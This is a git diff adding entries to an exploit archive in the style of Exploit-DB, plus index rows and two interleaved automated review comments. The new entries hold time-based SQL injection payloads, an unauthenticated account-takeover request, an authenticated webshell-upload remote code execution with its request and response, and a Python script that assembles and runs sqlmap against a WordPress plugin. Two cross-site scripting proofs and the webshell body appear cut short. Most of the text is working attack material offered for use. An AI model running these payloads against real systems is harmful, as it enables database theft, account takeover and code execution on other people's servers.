diff --git a/exploits/php/webapps/50729.txt b/exploits/php/webapps/50729.txt new file mode 100644 index 000000000..22c4113a6 --- /dev/null +++ b/exploits/php/webapps/50729.txt @@ -0,0 +1,34 @@ +# Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi +# Exploit Author: nu11secur1ty +# Date: 02.10.2022 +# Vendor: https://github.com/kabirkhyrul +# Software: https://github.com/kabirkhyrul/HMS +# CVE-2022-23366 + +# Description: +The loginid and password parameters from Hospital Management Startup +1.0 appear to be vulnerable to SQL injection attacks. +The attacker can retrieve all information from the administrator +account of the system and he can use the information for malicious +purposes! +WARNING: If this is in some external domain, or some subdomain, or +internal, this will be extremely dangerous! + +Status: CRITICAL + + +[+] Payloads: + +```mysql +--- +Parameter: loginid (POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND +(SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND +'sDHP'='sDHP&rememberme=on&submit=Login +--- + +``` +# Reproduce: +https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366 \ No newline at end of file diff --git a/exploits/php/webapps/50730.txt b/exploits/php/webapps/50730.txt new file mode 100644 index 000000000..10a0a1c08 --- /dev/null +++ b/exploits/php/webapps/50730.txt 
@@ -0,0 +1,65 @@ +# Exploit Title: Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated) +# Date: 9/02/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html +# Version: 1.0 +# Tested on: XAMPP, Linux + + +Home Owners Collection Management System is vulnerable to unauthenticated account takeover. +An attacker can takeover any registered 'Staff' user account by just sending below POST request +By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters + +#Steps to Reproduce + +1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters. + +2. Go to http://localhost/hocms/admin/ and Log in to the user account by changed username and password + + +============================================== + +POST /hocms/classes/Users.php?f=save HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------8012296389370411172619882391 +Content-Length: 899 +Origin: http://localhost +Connection: close +Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju + +-----------------------------8012296389370411172619882391 +Content-Disposition: form-data; name="id" + + +-----------------------------8012296389370411172619882391 +Content-Disposition: form-data; name="firstname" + +hi +-----------------------------8012296389370411172619882391 +Content-Disposition: form-data; name="lastname" + +test +-----------------------------8012296389370411172619882391 +Content-Disposition: form-data; name="username" + +saud +-----------------------------8012296389370411172619882391 +Content-Disposition: 
form-data; name="password" + +saud +-----------------------------8012296389370411172619882391 +Content-Disposition: form-data; name="type" + +1 +-----------------------------8012296389370411172619882391 +Content-Disposition: form-data; name="img"; filename="" +Content-Type: application/octet-stream + + +-----------------------------8012296389370411172619882391-- \ No newline at end of file diff --git a/exploits/php/webapps/50731.txt b/exploits/php/webapps/50731.txt new file mode 100644 index 000000000..b008dd6a1 --- /dev/null +++ b/exploits/php/webapps/50731.txt 
@@ -0,0 +1,119 @@ +# Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated) +# Date: 9/02/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html +# Version: 1.0 +# Tested on: XAMPP, Linux + +# Request sent as base user + +POST /hocms/classes/SystemSettings.php?f=update_settings HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------31935477191495174627236953215 +Content-Length: 769 +Origin: http://localhost +Connection: close +Referer: http://localhost/hocms/admin/?page=system_info +Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju + + +-----------------------------31935477191495174627236953215 +Content-Disposition: form-data; name="name" + + + +Home Owners Collection Management System' + +-----------------------------31935477191495174627236953215 +Content-Disposition: form-data; name="short_name" + + + +HOCMS - PHP + +-----------------------------31935477191495174627236953215 +Content-Disposition: form-data; name="img"; filename="" +Content-Type: application/octet-stream + + + + + +-----------------------------31935477191495174627236953215 +Content-Disposition: form-data; name="cover"; filename="cmd.php" +Content-Type: application/x-php + + + + + + + + + +-----------------------------31935477191495174627236953215-- + + +# Response + +HTTP/1.1 200 OK +Date: Wed, 09 Feb 2022 09:32:16 GMT +Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1 +X-Powered-By: PHP/8.1.2 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache 
+Access-Control-Allow-Origin: * +Content-Length: 1 +Connection: close +Content-Type: text/html; charset=UTF-8 + + + +1 + + +# ------------------------------------------------------------------------------------------ +# Request to webshell +# ------------------------------------------------------------------------------------------ + +GET /hocms/uploads/1644399120_cmd.php?s=echo+0xSaudi HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju +Upgrade-Insecure-Requests: 1 + + +# ------------------------------------------------------------------------------------------ +# Webshell response +# ------------------------------------------------------------------------------------------ + +HTTP/1.1 200 OK +Date: Wed, 09 Feb 2022 09:39:06 GMT +Server: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1 +X-Powered-By: PHP/8.1.2 +Access-Control-Allow-Origin: * +Content-Length: 33 +Connection: close +Content-Type: text/html; charset=UTF-8 + + + +0xSaudi + + + \ No newline at end of file diff --git a/exploits/php/webapps/50732.txt b/exploits/php/webapps/50732.txt new file mode 100644 index 000000000..992226762 --- /dev/null +++ b/exploits/php/webapps/50732.txt 
@@ -0,0 +1,26 @@
+# Exploit Title: Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection
+# Date: 9/02/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: XAMPP, Windows 10
+
+
+# Vulnerable Code
+
+line 68 in file "/hocms/admin/members/view_member.php"
+
+$collection = $conn->query("SELECT * FROM `collection_list` where member_id = '{$id}' order by date(date_collected) desc");
+
+
+# Sqlmap command:
+
+sqlmap -u 'http://localhost/hocms/admin/?id=0&page=members/view_member' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch
+
+# Output:
+
+Parameter: id (GET)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: id=0' AND (SELECT 9980 FROM (SELECT(SLEEP(5)))POvo)-- OyKE&page=members/view_member
\ No newline at end of file
diff --git a/exploits/php/webapps/50733.py b/exploits/php/webapps/50733.py
new file mode 100755
index 000000000..dec7ac4c3
--- /dev/null
+++ b/exploits/php/webapps/50733.py
@@ -0,0 +1,64 @@ +# Exploit Title: WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated) +# Date 08.02.2022 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://ays-pro.com/ +# Software Link: https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip +# Version: < 2.8.2 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2021-24931 +# CWE: CWE-89 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24931/README.md + +''' +Description: +The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the +sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated +and authenticated users) before using it in a SQL statement, leading to an SQL injection. +''' + +banner = ''' + + .--. .-..-. .--. .---. .--. .---. ,-. .---. .-. .--. .----. ,-. +: .--': :: :: .--' `--. :: ,. :`--. :.' : `--. : .'.': .; :`-- ;.' : +: : : :: :: `; _____ ,',': :: : ,',' `: : _____ ,','.'.'_`._, : .' ' `: : +: :__ : `' ;: :__:_____:.'.'_ : :; :.'.'_ : ::_____:.'.'_ :_ ` : : : _`,`. : : +`.__.' `.,' `.__.' :____;`.__.':____; :_; :____; :_: :_:`.__.' 
:_; + + [+] Copy Content Protection and Content Locking - SQL Injection + [@] Developed by Ron Jost (Hacker5preme) + +''' +print(banner) +import argparse +from datetime import datetime +import os + +# User-Input: +my_parser = argparse.ArgumentParser(description= 'Copy Content Protection and Content Locking SQL-Injection (unauthenticated)') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH + +# Exploit: +print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) +print('[*] Payload for SQL-Injection:') +exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" ' +print(' Sqlmap options:') +print(' -a, --all Retrieve everything') +print(' -b, --banner Retrieve DBMS banner') +print(' --current-user Retrieve DBMS current user') +print(' --current-db Retrieve DBMS current database') +print(' --passwords Enumerate DBMS users password hashes') +print(' --tables Enumerate DBMS database tables') +print(' --columns Enumerate DBMS database table column') +print(' --schema Enumerate DBMS schema') +print(' --dump Dump DBMS database table entries') +print(' --dump-all Dump all DBMS databases tables entries') +retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') +exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0' +os.system(exploitcode) +print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) \ No newline at end of file diff --git a/exploits/php/webapps/50734.txt b/exploits/php/webapps/50734.txt new file mode 100644 index 000000000..8dc4efd4b --- /dev/null +++ b/exploits/php/webapps/50734.txt 
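Review bot: `target_ip`, `target_port` and `wp_path` are all `None` when their flag is omitted, so the concatenation on the `exploitcode_url = r'sqlmap "http://' + target_ip + ...` line fails with a TypeError instead of a usage message; add `required=True` to each of the three `my_parser.add_argument(...)` calls so argparse rejects the missing flag up front. The command handed to `os.system` is also a single string assembled from the unvalidated `input()` answer, so whatever the operator types is interpreted by the shell; building an argument list and calling `subprocess.run` would keep that answer as data, and its return code, which `os.system` discards here, could then be checked. The `str()` around `datetime.now().strftime(...)` in the two timestamp prints is redundant since strftime already returns a string, and `print(banner)` runs before the `import` lines, which PEP 8 places at the top of the module.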
@@ -0,0 +1,13 @@
+# Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)
+# Date: 2022-02-07
+# Author: Milad karimi
+# Software Link: https://wordpress.org/plugins/contact-forms-builder/
+# Version: 1.6.1
+# Tested on: Windows 11
+# CVE: N/A
+
+1. Description:
+This plugin creates a Contact Form Builder from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
+
+2. Proof of Concept:
+http://localhost/code_generator.php?form_id=
\ No newline at end of file
diff --git a/exploits/php/webapps/50735.txt b/exploits/php/webapps/50735.txt
new file mode 100644
index 000000000..305e1ac2b
--- /dev/null
+++ b/exploits/php/webapps/50735.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)
+# Date: 2022-02-07
+# Author: Milad karimi
+# Software Link: https://wordpress.org/plugins/jetpack
+# Version: 9.1
+# Tested on: Windows 11
+# CVE: N/A
+
+1. Description:
+This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
+
+2. Proof of Concept:
+http://localhost/modules/contact-form/grunion-form-view.php?post_id=
\ No newline at end of file
diff --git a/exploits/windows/local/50728.txt b/exploits/windows/local/50728.txt
new file mode 100644
index 000000000..682f775bd
--- /dev/null
+++ b/exploits/windows/local/50728.txt
@@ -0,0 +1,19 @@ +# Exploit Title: Cain & Abel 4.9.56 - Unquoted Service Path +# Exploit Author: Aryan Chehreghani +# Date: 2022-02-08 +# Software Link: https://www.malavida.com/en/soft/cain-and-abel +# Version: 4.9.56 +# Tested on: Windows 10 x64 + +# PoC + +SERVICE_NAME: Abel + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Cain\Abel64.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Abel + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 416d9098c..1054b5176 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11438,6 +11438,7 @@ id,file,description,date,author,type,platform,port 50691,exploits/windows/local/50691.txt,"Mozilla Firefox 67 - Array.pop JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows, 50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",1970-01-01,LiquidWorm,local,macos, 50708,exploits/windows/local/50708.txt,"FLAME II MODEM USB - Unquoted Service Path",1970-01-01,"Ismael Nava",local,windows, +50728,exploits/windows/local/50728.txt,"Cain & Abel 4.9.56 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 
@@ -44802,3 +44803,10 @@ id,file,description,date,author,type,platform,port
 50725,exploits/php/webapps/50725.txt,"Exam Reviewer Management System 1.0 - ‘id’ SQL Injection",1970-01-01,"Juli Agarwal",webapps,php,
 50726,exploits/php/webapps/50726.txt,"Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Juli Agarwal",webapps,php,
 50727,exploits/php/webapps/50727.txt,"AtomCMS v2.0 - SQLi",1970-01-01,"Luca Cuzzolin",webapps,php,
+50729,exploits/php/webapps/50729.txt,"Hospital Management Startup 1.0 - 'Multiple' SQLi",1970-01-01,nu11secur1ty,webapps,php,
+50730,exploits/php/webapps/50730.txt,"Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)",1970-01-01,"Saud Alenazi",webapps,php,
+50731,exploits/php/webapps/50731.txt,"Home Owners Collection Management System 1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Saud Alenazi",webapps,php,
+50732,exploits/php/webapps/50732.txt,"Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection",1970-01-01,"Saud Alenazi",webapps,php,
+50733,exploits/php/webapps/50733.py,"WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)",1970-01-01,"Ron Jost",webapps,php,
+50734,exploits/php/webapps/50734.txt,"WordPress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,
+50735,exploits/php/webapps/50735.txt,"WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,
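Review bot: The added 50729 row titles the entry `"Hospital Management Startup 1.0 - 'Multiple' SQLi"` while the header line of the new `exploits/php/webapps/50729.txt` in this same commit reads `# Exploit Title: Hospital Management Startup 1.0 - 'loginid' SQLi`, so the index and the file disagree on the entry's title and a search on either string finds only one of them. The file's description does also name the password parameter, so the `'Multiple'` wording may be the intended one, in which case the file header is the line to bring in step. The other six added rows match their file headers apart from the `Wordpress`/`WordPress` capitalisation in 50734.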